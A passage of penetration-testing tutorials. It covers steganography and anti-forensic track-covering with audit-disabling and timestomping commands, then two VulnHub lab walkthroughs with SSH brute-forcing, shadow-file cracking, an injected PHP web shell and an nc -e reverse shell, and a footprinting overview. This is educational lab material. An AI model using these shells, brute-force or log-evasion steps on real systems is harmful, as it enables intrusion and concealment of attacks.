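            stego[pos] = (stego[pos] & 0xFE) | ((byte >> shift) & 1)
            pos += 1
    return bytes(stego)


def lsb_extract(stego: bytes) -> bytes:
    """Reverse of lsb_embed: read the length header, then that many bytes."""
    def read(start: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[start + b * 8 + k] & 1)
            out.append(value)
        return bytes(out)

    (length,) = struct.unpack(">I", read(0, HEADER))
    return read(HEADER * 8, length)


def pair_imbalance(pixels: bytes, n: int = 0) -> float:
    """Statistical attack (pairs of values).

    In a cover image the counts of the values 2k and 2k+1 are generally
    unequal; sequential LSB embedding of roughly balanced bits drives each
    pair towards equality. Returns sum |n(2k) - n(2k+1)| / N over the first
    n bytes (all bytes if n == 0): high for a cover, close to 0 for a stego.
    """
    sample = pixels[:n] if n else pixels
    counts = [0] * 256
    for v in sample:
        counts[v] += 1
    diff = sum(abs(counts[2 * k] - counts[2 * k + 1]) for k in range(128))
    return diff / len(sample)


def make_cover(size: int, seed: int = 1) -> bytes:
    """Constructed cover: 85 % of the pixel values even. Real images are far
    less skewed; the exaggeration only makes the statistic easy to see."""
    rng = random.Random(seed)
    return bytes(
        (rng.randrange(256) & 0xFE) | (1 if rng.random() < 0.15 else 0)
        for _ in range(size)
    )


SECRET = b"The salary file is encrypted with the root password. " * 40  # constructed


def demo() -> dict:
    cover = make_cover(20_000)
    stego = lsb_embed(cover, SECRET)
    region = (HEADER + len(SECRET)) * 8          # bytes touched by the embedding
    return {
        "recovered": lsb_extract(stego),
        "cover_imbalance": pair_imbalance(cover, region),
        "stego_imbalance": pair_imbalance(stego, region),
    }


if __name__ == "__main__":
    r = demo()
    print(r["recovered"][:40], r["cover_imbalance"], r["stego_imbalance"])
```

The statistic is computed only over the region the embedding touched; a real attack slides the same window along the image to find where the balanced region ends, which also estimates the payload length. Embedding into randomly chosen pixels instead of consecutive ones is the usual countermeasure, and is why the test works best against naive sequential tools.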

Covering tracks

Covering tracks is the final stage of a penetration test as a process; everything after it is paperwork. In a nutshell, its goal is to erase the digital traces left by the pentester during the earlier stages of the test, the signs that prove the pentester’s presence in the targeted computer system. The same applies to an attacker, probably without the paperwork.

The purpose of this phase is to cover up all the little clues that would give away the nature of attackers’ deeds. Covering Tracks consists of:

  1. Measures for the prevention of real-time detection (Anti-Incident Response).
  2. Measures for the prevention of digital evidence collection during a possible post factum inquiry (Anti-Forensics).

Most common techniques that are often used by attackers to cover tracks on a target system are:

  • Disabling auditing
  • Moving, hiding, altering or renaming log files
  • Deleting evidence
  • Log tampering

Disabling Auditing

Operating systems have auditing facilities that detect, monitor and track events. One of the best methods an attacker can use is simply not to leave any trace of having been there: if, once they have access to a system, they disable auditing, their activity is not recorded, and, better still from their point of view, they re-enable it when they leave so that the interruption goes unnoticed. On Linux, for instance, “auditctl -e 0” pauses auditd, and on Windows “auditpol /clear” wipes the audit policy; the act of stopping auditing is normally logged itself, which is one of the few traces this leaves.

Moving, Hiding, Altering or Renaming Files

Moving files, changing extensions, renaming, splitting a file into small pieces and hiding each piece at the end of other files, or hiding one file inside another, seem naive but are very effective, especially when we consider that the people involved in a cyber investigation often do not have the time to examine one by one all the files residing in a computer system.

And timestamps: because investigators are short of time, one approach that lets them prioritise their search is to arrange the information in chronological order and focus on the data created around the moment of the incident, if it is known. Attackers counter this by modifying the metadata of any files they want; in most cases they change the dates on which each file was created, last accessed or last modified. This effective anti-forensic technique is called timestomping, and tools to detect it exist: on NTFS, the $STANDARD_INFORMATION timestamps that such tools change can be compared with the $FILE_NAME timestamps they usually leave untouched, and on Linux “touch -d” rewrites the access and modification times but the inode change time (ctime) still records when that happened.

Deleting Evidence

A common delusion among people who count on commercial disk cleaners or privacy protection tools to delete data they do not want others to see is the belief that these tools remove everything from the hard disk once and for all.

Despite the imperfection of ordinary deletion, a well-done erase will irreversibly dispose of evidence and leave investigators empty-handed. Nevertheless, less proficient users are prone to mistakes, which may cost them a lot when an attempt to delete data on the hard disk fails.

Unless we are discussing SSDs, where TRIM and the drive’s garbage collection usually make deleted blocks unrecoverable shortly after deletion, hard drives and other storage media are susceptible to almost full recovery via data carving, because a normal delete only unlinks the file and leaves its blocks in place until they happen to be overwritten. All in all, this method is very popular but not so effective.

Log Tampering

In Windows the logs are the event logs (Application, Security, System and the per-service channels), viewed with Event Viewer, easily found via the Start menu search, and stored on disk under %SystemRoot%\System32\winevt\Logs. In almost all Linux and UNIX systems the log files are under /var/log. On macOS they live in /var/log and /Library/Logs (per-user logs in ~/Library/Logs); the Console application displays them, or one can open the Finder, choose “Go to Folder” in the Go menu and type /Library/Logs.

If administrators want to check for malicious activities within the system for which they are responsible, they simply examine the log files. There are two kinds of log files: system generated and application generated.

When it comes to log manipulation, the attacker usually has two options: delete the log, or alter its content. Deleting log files and replacing system binaries with trojaned versions is meant to ensure that the security staff of the targeted company do not find evidence of the intrusion.

The first choice, deleting the log files, is not always the ultimate solution to undetectability, since the removal of such information creates a gap in the logs and raises suspicion. One look at the processes and log files can be enough for a system administrator at the target’s premises to establish the existence of malicious activity.
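An added example (not from the article) of what a defender looks for after the tampering described above, run over constructed syslog-style lines: a silent gap where lines were deleted, a timestamp that runs backwards where a line was edited back in, and the message systemd prints when the audit daemon is stopped. The hostname, user names and addresses are invented; the gap threshold and the marker strings are parameters to adapt to the host.

```python
"""Three cheap checks for the traces that log tampering leaves behind.

Lines are expected as '<ISO timestamp> <host> <message>'. SAMPLE_LOG is
constructed for the example and is not real system output."""
import re
from datetime import datetime, timedelta
from typing import List, Tuple

Entry = Tuple[datetime, str, str]            # (timestamp, host, message)
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) (\S+) (.*)$")

SAMPLE_LOG = """\
2024-03-01T10:00:05 srv1 sshd[812]: Accepted password for aadams from 10.0.0.7 port 51234 ssh2
2024-03-01T10:00:31 srv1 sudo: aadams : TTY=pts/0 ; PWD=/home/aadams ; USER=root ; COMMAND=/bin/cat /etc/shadow
2024-03-01T10:01:02 srv1 CRON[901]: (root) CMD (run-parts /etc/cron.hourly)
2024-03-01T13:45:10 srv1 CRON[977]: (root) CMD (run-parts /etc/cron.hourly)
2024-03-01T13:40:00 srv1 sshd[812]: pam_unix(sshd:session): session closed for user aadams
2024-03-01T13:46:00 srv1 systemd[1]: Stopping Security Auditing Service...
"""

# Example markers for "auditing was switched off": the systemd unit name of
# auditd, and the field the kernel logs on an audit configuration change.
AUDIT_STOP_MARKERS = ("Stopping Security Auditing Service", "audit_enabled=0")


def parse(log: str) -> List[Entry]:
    entries = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)))
    return entries


def find_gaps(entries: List[Entry],
              max_gap: timedelta = timedelta(hours=1)) -> List[Tuple[datetime, datetime]]:
    """Pairs of consecutive timestamps further apart than max_gap. Pick the
    threshold from something the host logs at least once per period, such
    as the hourly cron run: two hourly runs with nothing in between is a gap."""
    return [(a[0], b[0]) for a, b in zip(entries, entries[1:]) if b[0] - a[0] > max_gap]


def find_time_regressions(entries: List[Entry]) -> List[Entry]:
    """Entries stamped earlier than the entry before them. A daemon appending
    to its own log does not do that (barring a clock step); an editor pasting
    a line back in does."""
    return [b for a, b in zip(entries, entries[1:]) if b[0] < a[0]]


def find_audit_stops(entries: List[Entry]) -> List[Entry]:
    return [e for e in entries if any(marker in e[2] for marker in AUDIT_STOP_MARKERS)]


def report(log: str) -> dict:
    entries = parse(log)
    return {
        "entries": len(entries),
        "gaps": find_gaps(entries),
        "regressions": find_time_regressions(entries),
        "audit_stops": find_audit_stops(entries),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_LOG).items():
        print(key, value)
```

None of the three checks proves tampering on its own: a host that was switched off produces a gap, and an NTP step produces a regression. Their value is that they are cheap to run against a log that has already been shipped to a central collector, where the attacker cannot reach it.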

CEH (VII): System Hacking

WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are, or can be, installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are in the same network and that we can see the training machine from the testing machine. We can use the “ping” command, which in this case is going to fail, or the “netdiscover” command, to list a couple of options. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the next step is to take a look at the web page it serves. We can see a brief explanation of the challenge and not much more, but reading the page carefully reveals something very important: a list of e-mail addresses related to the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr.System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us some useful information:

  • Names of people working in the company.
  • Valid e-mail addresses.
  • The convention used to build usernames (last name followed by the first initial).

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
Figure 2. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service; something about it does not look right.
  • 22: SSH service
  • 25: SMTP service
  • 80: HTTP service
  • 110: POP3 service
  • 143: IMAP service
Since we have no other information, we need to think about what we are missing. We already have some valid e-mail addresses, and from them we can build a list of possible usernames in the system, adding accounts like “root” or “admin” that are always worth trying. Our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee
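An added example, not part of the walkthrough, that builds the list above mechanically and adds the other username formats one commonly meets, so the same script serves any target whose e-mail convention we have seen. The names are the three admins from the contact page; “root” and “admin” are the usual extra guesses.

```python
"""Build a candidate user list from the names found on the target's web page."""
import re
from typing import Iterable, List


def username_candidates(full_name: str) -> List[str]:
    """Common username formats for a 'First [Middle] Last' name."""
    tokens = [re.sub(r"[^a-z]", "", t) for t in full_name.lower().split()]
    tokens = [t for t in tokens if t]
    if len(tokens) < 2:
        return tokens
    first, last = tokens[0], tokens[-1]
    f, l = first[0], last[0]
    patterns = {
        f + last,             # aadams
        last + f,             # adamsa   (the format used in the site's e-mails)
        last + first[:2],     # adamsad
        first + "." + last,   # adam.adams
        first + last,         # adamadams
        first + "_" + last,   # adam_adams
        first + l,            # adama
        l + first,            # aadam
        first,                # adam
        last,                 # adams
    }
    return sorted(patterns)


def build_userlist(names: Iterable[str],
                   extras: Iterable[str] = ("root", "admin")) -> List[str]:
    """Extras first, then every candidate for every name, without duplicates
    and in a stable order, so the output can be fed straight to medusa -U."""
    out: List[str] = []
    for user in list(extras) + [u for n in names for u in username_candidates(n)]:
        if user not in out:
            out.append(user)
    return out


ADMINS = ["Adam Adams", "Bob Banter", "Chad Coffee"]   # taken from the contact page

if __name__ == "__main__":
    print("\n".join(build_userlist(ADMINS)))           # redirect to users.txt
```

Keep the list short and put the observed format first: each extra candidate multiplies the number of SSH login attempts, and a noisy dictionary attack against a real target is exactly what fail2ban-style lockouts are there to catch.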

Now that we have a list of possible users, we can try the SSH service. For this we use the tool “medusa” to run a dictionary attack and see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
Figure 3. medusa result

As we can see, we have been able to crack one password. Let’s use it and try to connect over SSH.

ssh aadams@192.168.1.100
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine and use “John” to discover new passwords, especially the “root” password. Once copied, we “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt
Figure 7. unshadowing the passwd and shadow files

To save a little time, and because we already have a working user, “aadams”, we can copy just the “root” entry to a file and try to break only the “root” password.

john just_root.txt
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
Figure 9. SSH connection as “root” failing

As we can see, we cannot connect as “root” over SSH (most likely root logins are disabled in the SSH daemon, a common hardening setting), but we still have the “root” password and a valid user, “aadams”. Let’s log in as aadams and switch to root with “su”.

Figure 10: We are root!

Usually, now that we are root, we could close the case and deliver our report. But looking around a little we find an interesting file and, since this is a training exercise, we can play a bit more. The file is this one:

Figure 11. Curious file
Figure 12. Encrypted file, maybe
binwalk salary_dec2003.csv.enc
Figure 13. Confirming it is an encrypted file

What do we know about the file:

  • It is encrypted with OpenSSL (the “Salted__” magic at the start of the file gives that away).
  • It was in a folder only accessible by the “root” user, so it may well be encrypted with the “root” password we already have.
  • We do not know which cipher was used.

We can check the ciphers that OpenSSL offers (recent releases list them with “openssl enc -ciphers”; the invocation below printed the list in the usage message of the release used here).

openssl enc help
Figure 14. Available ciphers

Let’s try one of them, out of curiosity, to see what an error looks like, and after that let’s figure out how to try all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
Figure 15. Decrypting the file

I guess it is because this is just a training environment, but the first cipher tried, aes-128-cbc, does the job and no more attempts are needed. In the real world we should write a script that tries every available cipher, and keep in mind that the key-derivation digest matters too: OpenSSL releases before 1.1.0 derived the key from the password with MD5, while later releases default to SHA-256, so a file encrypted years ago may only decrypt with “-md md5” added.
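Such a script, as an added example that is not part of the walkthrough: it asks the local OpenSSL for its cipher names, tries each one (with both key-derivation digests) against the file with the known password, and keeps the first output that looks like plaintext rather than trusting the exit status alone. It assumes an OpenSSL 1.1.0 or later binary on the PATH, which lists the cipher names with “openssl enc -ciphers”, and that a readable result is mostly printable ASCII, which holds for a CSV.

```python
"""Try every cipher `openssl enc` knows against a file encrypted with a known
password and keep the first output that looks like plaintext.

Assumes OpenSSL >= 1.1.0 on PATH; the file name and password below are the
ones from the walkthrough."""
import subprocess
from pathlib import Path
from typing import Iterable, List, Optional, Tuple


def parse_cipher_list(text: str) -> List[str]:
    """Cipher names from `openssl enc -ciphers` output (tokens like -aes-128-cbc)."""
    return sorted({tok.lstrip("-") for tok in text.split() if tok.startswith("-")})


def list_ciphers() -> List[str]:
    proc = subprocess.run(["openssl", "enc", "-ciphers"], capture_output=True, text=True)
    return parse_cipher_list(proc.stdout + proc.stderr)


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """A wrong cipher or key usually ends in a padding error, but stream and
    non-padded modes 'succeed' and emit random bytes, so check the content."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= threshold


def try_ciphers(enc_path: str, password: str,
                ciphers: Optional[Iterable[str]] = None,
                digests: Iterable[str] = ("sha256", "md5")) -> Optional[Tuple[str, str]]:
    """Return (cipher, digest) of the first combination that decrypts to text.

    The digest matters: files made with OpenSSL 1.0.x derive the key with MD5,
    releases from 1.1.0 on default to SHA-256, so an old file needs -md md5."""
    out_path = Path(enc_path).with_suffix("")           # salary_dec2003.csv.enc -> .csv
    for name in (list(ciphers) if ciphers else list_ciphers()):
        for md in digests:
            proc = subprocess.run(
                ["openssl", "enc", "-d", "-" + name, "-md", md,
                 "-in", enc_path, "-out", str(out_path), "-k", password],
                capture_output=True)
            if proc.returncode == 0 and out_path.exists() and looks_like_text(out_path.read_bytes()):
                return name, md
    if out_path.exists():
        out_path.unlink()                               # leave no garbage behind
    return None


if __name__ == "__main__":
    print(try_ciphers("salary_dec2003.csv.enc", "tarot"))
```

Run it in a scratch directory: every attempt rewrites the output file, and the function deletes it only if nothing worked. The cipher list includes modes that never fail on a wrong key (stream ciphers, CFB/OFB/CTR), which is exactly why the plaintext heuristic, not the return code, decides.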

Figure 16. File decrypted

With this our scenario finishes. We have access to the machine, we have root permissions and we have decrypted the “salary” file; our job is done. It has been interesting, but I think it was only possible because the passwords were not very strong.


Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest:

  • All tests will be restricted to the systems identified on the 192.168.2.0/24 network.
  • All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report.
  • A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are, or can be, installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are in the same network and that we can see the training machine from the testing machine. We can use the “ping” command or the “netdiscover” command, to list a couple of options. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look at the web page it serves. In this case the page itself gives little information and nothing interesting, but its source code gives us the first good lead: a comment in the page contains some credentials.

Figure 2. Credentials found in the source code

There is nothing else to do here but, to be sure we are not missing pages or folders, let’s run a different tool against the web server. The tool is going to be “dirb”:

dirb http://192.168.2.120
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that responds in the browser is “/logs”. Unfortunately, it returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
Figure 4. nmap results

As we can see, there are a few ports open on the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: At this point I am not sure what this is. In addition, it does not always show up in the scan results.

Since we have some credentials, let’s try to connect to the different services. There is no luck with SSH, but FTP lets us log in and explore. Unfortunately, we can only find one file.

Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

At this point, I must admit that I was a bit lost and running out of ideas, so I went for a walk and, in the meantime, left “Wireshark” running. Why? Because both are good ideas: go for a walk when you are blocked, and you never know what you can find on the network. After taking a look at the traffic I saw some (a lot of) requests asking for the IP address “192.168.2.240”.

Figure 7. Wireshark results

At this point I decided to change the IP of my testing machine to that address and start “Wireshark” again to see what happened, and there was one interesting event: apparently the training machine tries to establish a connection to “192.168.2.240” (now my machine) on port 10000.

Figure 8. Wireshark results

Then, let’s accept this connection to see what happens. To do so, let’s run “netcat” as a listener and wait again, saving whatever arrives to a file:

nc -lvvp 10000 > output

Here we can see that the connection is made at some point and we receive what looks like a binary file, saved as “output”. After some investigation we can see it is a “tar.gz” file (exiftool identifies it; “file output” would too). There is nothing interesting inside, but it is clearly a backup file.

Figure 9. Wireshark result
exiftool --list output
Figure 10. exiftool result
Figure 11. Exploring backup file

Linking the facts, nmap showed a port 10001 we do not understand, the server has a page that shows backup result messages, and we are clearly receiving a backup file, we can infer that port 10001 may only open while the machine waits for a response about the backup it has just sent. To test this theory, let’s try to connect to port 10001 right after the backup is sent. Since we do not know when that will be, we simply try repeatedly:

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes the connection is established and we can type a few instructions.

Figure 12. Wireshark results

Apparently they do nothing but, when we go back to the backup log messages page, we can see what we have been typing.

Figure 13. Messages typed

Then, let’s type something that lets us do something useful and gain access to the training machine. Since what we send ends up inside a PHP page, let’s inject a one-line PHP web shell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
Figure 14. Connection result

As we can see (at the end of the image) we are running commands as “apache” on the training machine. Now let’s get a proper shell from which to execute commands and look at the system properly. We open a listener on a port on our system and make the training machine connect back to it with a shell:

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh

And, success, we have our shell.

Figure 15. Shell in the training machine

The next step is to look for the credential files, but unfortunately we can only read “/etc/passwd”; the password hashes are (I guess) in “/etc/shadow”, which we cannot read as “apache”.

Our next step is to look around the machine. After some exploration we find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: the public key of a user allowed to connect with SSH, in this case “hbeale”.
  • id_rsa: the matching private key.
Figure 16. User with SSH access
Figure 17. Private key

Copying the private key to our system (saved with permissions 600 and passed to ssh with “-i” if it is not placed at ~/.ssh/id_rsa), we can try to connect.

ssh hbeale@192.168.2.120
Figure 18. SSH access

Let’s check which commands we can execute with “sudo”. We can see that we can use “cat” to read file content.

sudo -l
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

Figure 20. /etc/shadow content

Here we can see the hash of the “root” user. We copy it to a file on our system (root_password) and try to escalate our privileges by cracking it with “John” (John the Ripper), using one of the dictionaries that come with Kali.

john --wordlist=rockyou.txt root_password
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

Figure 22. We are root!

With this our scenario finishes. We have access to the machine and we have root permissions; our job is done. It has been fun and frustrating, but I do not think there would be the first one without the second one.


Footprinting and Reconnaissance

What is Footprinting?

Footprinting is the first phase of a penetration test. It is the process of collecting as much information as possible about a target in order to identify possible vulnerabilities and entry points that make an attack effective.

Attackers gather information using public resources available on the Internet, in the real world (dumpster diving, for example) or through social engineering. They try to find the specific areas where they should focus their efforts, identify vulnerabilities in the systems so as to select the appropriate attack methodologies and/or exploits, and draw a map of the organization’s network; in general, they need to learn as much as they can about the target and find anything that can help them in the next phases of the attack.

There are some clear objectives during the footprinting like:

  • Collect network information: domain names, internal domain names, network blocks, IP addresses of the reachable systems, rogue websites, private websites, TCP and UDP services running, access control mechanisms and ACLs, network protocols, VPN endpoints, IDSes running, analog and digital phone numbers, authentication mechanisms, system enumeration, …
  • Collect system information: user and group names, system banners, routing tables, SNMP information, system architecture, remote system type, system names, passwords, …
  • Collect organization’s information: employee details, organization’s website, company directory, location details, addresses and phone numbers, comments in HTML source code, security policies implemented, web server links relevant to the organization, background of the organization, news articles, press releases, …

Obviously, each attacker has their own style and methodology, but a very basic one can be:

  1. Footprinting through search engines.
  2. Footprinting using advanced search engine hacking techniques, like Google hacking.
  3. Footprinting through social network sites.
  4. Website footprinting.
  5. Email footprinting.
  6. Competitive intelligence.
  7. WHOIS footprinting.
  8. DNS footprinting.
  9. Network footprinting.
  10. Footprinting through social engineering.

Footprinting through search engines

Attackers use search engines to extract information about a target such as technology platforms, employee details, login pages, intranet portals, etc., which helps to perform social engineering attacks and other advanced attacks. Search engine caches and Internet archives can give us useful information that has already been removed from the websites.

And think big, as attackers do. Tools like Netcraft can give us a lot of information about the target, such as subdomains or the operating systems in use. Search engines like Shodan let us find specific computers or devices connected to the Internet. Map services (Google Maps, Bing Maps, …) give the physical context. Social network sites like Facebook and LinkedIn, and people-search sites like Pipl, are full of personal details that people publish without realizing it. Financial services sites, job sites, forums, blogs, groups… there are plenty of places to gather information about a target.

Footprinting using advanced search engine hacking techniques

Nowadays the search engines provide a rich syntax to refine our searches and, in the same way that it helps users perform more accurate searches, it lets attackers find and extract sensitive or hidden information. Take Google: as its help page shows, it offers multiple operators (site:, filetype:, inurl:, intitle:, …) to narrow a search down to resources that are not easily reachable otherwise, and the Google advanced search page exposes some of them through a simple form. This technique is very well known; there are even databases of such queries (“dorks”) to make our life easier, like the GHDB.

Footprinting through social network sites

I mentioned it in the first point, but it bears repeating: you cannot imagine the huge amount of information an attacker can find through social networks. And we should not restrict ourselves to searches; we can create fake profiles to lure employees into giving up sensitive information. From the users’/employees’ point of view, an attacker can gather contact info, location, friends lists, family lists, interests, activities, … From the company’s point of view, an attacker can gather business strategies, product profiles, contact points for social engineering, platform/technology information, type of business, … And more and more and more.

Website footprinting

Very interesting information can be gathered from the company’s website: the software used and its version, the operating system, sub-directories and parameters, filenames, paths, database field names or queries, the scripting platform, contact details and CMS details. Using tools like HTTP proxies (Burp Suite, OWASP ZAP, …) we can view the response headers, with information about the web server and the systems behind it. Examining the source code we can find the file system structure, contact details, the script type, interesting comments that were never deleted and cookie information. We do not need to do the search ourselves: web spiders can crawl the site for us, or we can do it offline by mirroring the entire website. In addition to the search engine caches, we can use archive.org to find information that was once online and has since been removed. Documents with metadata (author names, internal usernames, software versions) can be found here too.

Email footprinting

We can take two different paths here. The first is to examine the e-mail headers, where we can find useful information such as the relays the message went through, the originating IP address and the mail client used. The second is to use e-mail tracking tools to obtain information about the recipient when the message is opened.
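An added example (not from the article) of the first path, header examination, over a constructed message: it walks the Received headers in transit order to find where the message entered the mail system and pulls out the sender fields that are worth comparing with each other. The hosts use the RFC 5737 documentation address ranges, and the herot.net names echo the earlier walkthrough but are invented here.

```python
"""Trace a message back through its Received headers and pull out the fields
worth comparing. RAW_EMAIL is constructed for this example."""
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List, Optional

RAW_EMAIL = """\
Return-Path: <bounce@mailer.example.net>
Received: from mx.herot.net (mx.herot.net [203.0.113.10])
        by inbox.example.org with ESMTPS id abc123; Fri, 1 Mar 2024 10:05:12 +0000
Received: from webmail.herot.net (unknown [198.51.100.23])
        by mx.herot.net with ESMTP id def456; Fri, 1 Mar 2024 10:05:10 +0000
Received: from [192.0.2.77] (helo=laptop.local)
        by webmail.herot.net with ESMTPA; Fri, 1 Mar 2024 10:05:09 +0000
From: Adam Adams <adamsa@herot.net>
To: Bob Banter <banterb@herot.net>
Subject: Re: backup job
Message-ID: <20240301100509.1234@webmail.herot.net>
X-Mailer: Roundcube Webmail/1.6
Date: Fri, 1 Mar 2024 10:05:09 +0000

Looks fine to me.
"""

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def received_chain(raw: str) -> List[Dict[str, object]]:
    """Received headers in transit order, origin first.

    Each relay prepends its own header, so the last header in the message is
    the first hop. Only the headers added by relays you trust are reliable:
    anything below them could have been written by the sender."""
    msg = message_from_string(raw)
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        text = " ".join(header.split())               # unfold continuation lines
        m_from = re.search(r"\bfrom (\S+)", text)
        m_by = re.search(r"\bby (\S+)", text)
        hops.append({
            "from": m_from.group(1) if m_from else "",
            "ips": IP_RE.findall(text),
            "by": m_by.group(1) if m_by else "",
        })
    return hops


def originating_ip(raw: str) -> Optional[str]:
    """First address seen in the earliest hop: where the message entered the mail system."""
    for hop in received_chain(raw):
        if hop["ips"]:
            return hop["ips"][0]
    return None


def header_summary(raw: str) -> Dict[str, object]:
    """The fields worth comparing: From vs. Return-Path, the mail client,
    the host that minted the Message-ID and how many relays were crossed."""
    msg = message_from_string(raw)
    return {
        "from_addr": parseaddr(msg.get("From", ""))[1],
        "return_path": parseaddr(msg.get("Return-Path", ""))[1],
        "client": msg.get("X-Mailer") or msg.get("User-Agent") or "",
        "message_id_host": msg.get("Message-ID", "").rsplit("@", 1)[-1].rstrip(">"),
        "hops": len(msg.get_all("Received", [])),
        "origin_ip": originating_ip(raw),
    }


if __name__ == "__main__":
    for hop in received_chain(RAW_EMAIL):
        print(hop)
    print(header_summary(RAW_EMAIL))
```

For footprinting, the useful output is the infrastructure the chain exposes (the names and addresses of the target’s mail servers and webmail host, and the client software) rather than the sender’s address, which is trivially forged; the From/Return-Path comparison is what an investigator uses in the other direction, when deciding whether a message is a phish.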

Competitive intelligence

Information about competitors can be very useful, especially for social engineering attacks: the history of the company, its plans, expert opinions, website traffic, reputation, etc. Any of this can be useful.

WHOIS footprinting

WHOIS databases, maintained by the domain registries and registrars and, for IP address blocks, by the Regional Internet Registries, contain the registration details of domain and network owners: names, addresses, phone numbers, e-mail contacts and name servers. Much of the personal data is redacted nowadays, but the technical contacts, name servers and registration dates usually remain.

DNS footprinting

Attackers gather DNS information (name servers, mail exchangers, the records of a zone and, if the server allows it, full zone transfers) to determine the key hosts in the network, which in turn feeds social engineering attacks.

Footprinting through social engineering

Attackers can do things like eavesdropping, shoulder surfing, dumpster diving or impersonation on social networking sites to obtain interesting and useful information.

There are literally hundreds, probably thousands, of tools useful for this phase of an attack. It would be impossible to list all of them here, but I hope these lines are enough to highlight the importance of this phase.

See you.


Penetration testing phases

